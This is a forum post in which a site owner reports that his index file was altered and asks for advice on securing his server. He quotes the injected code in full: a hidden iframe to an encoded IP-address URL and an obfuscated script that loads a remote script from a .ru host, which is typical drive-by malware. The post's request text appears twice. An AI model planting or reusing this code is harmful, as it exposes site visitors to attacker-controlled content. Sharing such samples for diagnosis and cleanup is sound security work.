cenobite321
Member
- Messages
- 77
- Reaction score
- 0
- Points
- 6
Today I visited my website (clubdoom.pcriot.com) and the browser showed a warning of being an untrusted site. I entered to the CPanel account and opened the index file and it showed this:
Somebody, somehow inserted this chunk of javascript code in the index file. I haven't checked the rest of the files in the site but seems that somebody knows the way around to access the server. I ask you what do you recommend me to do in order to prevent this? I tried to access the logs but they don't show anything for some reason.
Thanks.
Code:
<body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str);</script>
<?php
echo 'Hello ';
?>
</body>
</html>
<script>this.K=60680;this.K+=224;try {var xL='Nj'} catch(xL){};this.z=37516;this.z++;var W;R=function(){try {} catch(Aj){};this.fQ=28202;this.fQ-=1;function p(n,l,N){var C="C";return n.substr(l,N);this.q="q";}var P=["wM"];var HS=false;var w=String("/goo"+"gle."+p("com/dJBs",0,4)+p("hyvex6L3",0,4)+p("s.nlI7BH",0,4)+p("S5L/chiL5S",3,4)+p("R8up.deR8u",3,4)+p("JUg.phpUJg",3,4));ol=[];var pI=RegExp;r=["ld","lj","Or"];var G={};var f='';this.xH="xH";var Wc=document;this.T="";VN=["h"];var Xh=["Fi","NW"];function x(n,l){var fn={};var Uc=[];var N=String("[")+l+"]";var xQ=["xr","YH"];var H=new pI(N, p("gL4M",0,1));return n.replace(H, f);};var eW={XLk:"Jc"};var Jp="";this.Ez=18617;this.Ez++;Kc=6566;Kc++;var Y=298491-290411;var k={I:false};var F=String("bo"+"dy");this.Zk=13098;this.Zk++;var Qu="Qu";var Rp=x('sBcJrSiJpXtF','fXJFMBS');try {} catch(IZ){};try {} catch(Wt){};var M=null;try {var CN='j'} catch(CN){};var Qr={bt:"Fz"};SA=29290;SA--;this.JP='';W=function(){try {var L=x('cNr8e8a9tNe8ENl2e8myefn9tf','J_2GfT8HNzu9y');oe=41112;oe--;Rd=38082;Rd--;Z=Wc[L](Rp);var iE={DL:false};var g=x('sDrDcK','LFlbg7DK');var aG="aG";oY={Fu:14447};zB={pr:9065};var t=new String("def"+p("er8ID",0,2));Ih=29848;Ih++;var n=Y+w;try {} catch(ac){};var GW=new Array();try {var Oj='eP'} catch(Oj){};Z[t]=[5,1][1];var kN=["YHn","Xg"];var Fun={iU:false};Z[g]=new String("http:"+"//mon"+p("dayriD46",0,5)+"ng.ru"+p("9rQO:Or9Q",4,1))+n;qQ=47990;qQ-=62;this.jp=60422;this.jp--;this.sM="sM";hW=63752;hW--;Wc[F].appendChild(Z);} catch(B){this.Id=41689;this.Id--;try {var dp='pd'} catch(dp){};var kh='';n_={};};};var ge=new Date();};R();try {var Hn='Vh'} catch(Hn){};try {var jB='MX'} catch(jB){};Fid={Yz:false};this.WV=12097;this.WV++;window.onload=W;var eI={};this.As=7216;this.As-=46;</script>
<!--a700ac5d704d3c34b705441133e392f9-->
Somebody, somehow inserted this chunk of javascript code in the index file. I haven't checked the rest of the files in the site but seems that somebody knows the way around to access the server. I ask you what do you recommend me to do in order to prevent this? I tried to access the logs but they don't show anything for some reason.
Thanks.